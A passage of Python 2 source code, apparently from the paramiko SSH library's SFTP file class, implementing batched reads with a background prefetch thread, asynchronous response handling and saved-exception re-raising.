@return: a list of blocks read, in the same order as in C{chunks}
@rtype: list(str)
@since: 1.5.4
"""
self.sftp._log(DEBUG, 'readv(%s, %r)' % (hexlify(self.handle), chunks))
read_chunks = []
for offset, size in chunks:
# don't fetch data that's already in the prefetch buffer
if self._data_in_prefetch_buffers(offset) or self._data_in_prefetch_requests(offset, size):
continue
# break up anything larger than the max read size
while size > 0:
chunk_size = min(size, self.MAX_REQUEST_SIZE)
read_chunks.append((offset, chunk_size))
offset += chunk_size
size -= chunk_size
self._start_prefetch(read_chunks)
# now we can just devolve to a bunch of read()s :)
for x in chunks:
self.seek(x[0])
yield self.read(x[1])
### internals...
def _get_size(self):
try:
return self.stat().st_size
except:
return 0
def _start_prefetch(self, chunks):
self._prefetching = True
self._prefetch_done = False
self._prefetch_reads.extend(chunks)
t = threading.Thread(target=self._prefetch_thread, args=(chunks,))
t.setDaemon(True)
t.start()
def _prefetch_thread(self, chunks):
# do these read requests in a temporary thread because there may be
# a lot of them, so it may block.
for offset, length in chunks:
self.sftp._async_request(self, CMD_READ, self.handle, long(offset), int(length))
def _async_response(self, t, msg):
if t == CMD_STATUS:
# save exception and re-raise it on next file operation
try:
self.sftp._convert_status(msg)
except Exception, x:
self._saved_exception = x
return
if t != CMD_DATA:
raise SFTPError('Expected data')
data = msg.get_string()
offset, length = self._prefetch_reads.pop(0)
self._prefetch_data[offset] = data
if len(self._prefetch_reads) == 0:
self._prefetch_done = True
def _check_exception(self):
"if there's a saved exception, raise & clear it"
if self._saved_exception is not None:
x = self._saved_exception
self._saved_exception = None
raise x
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.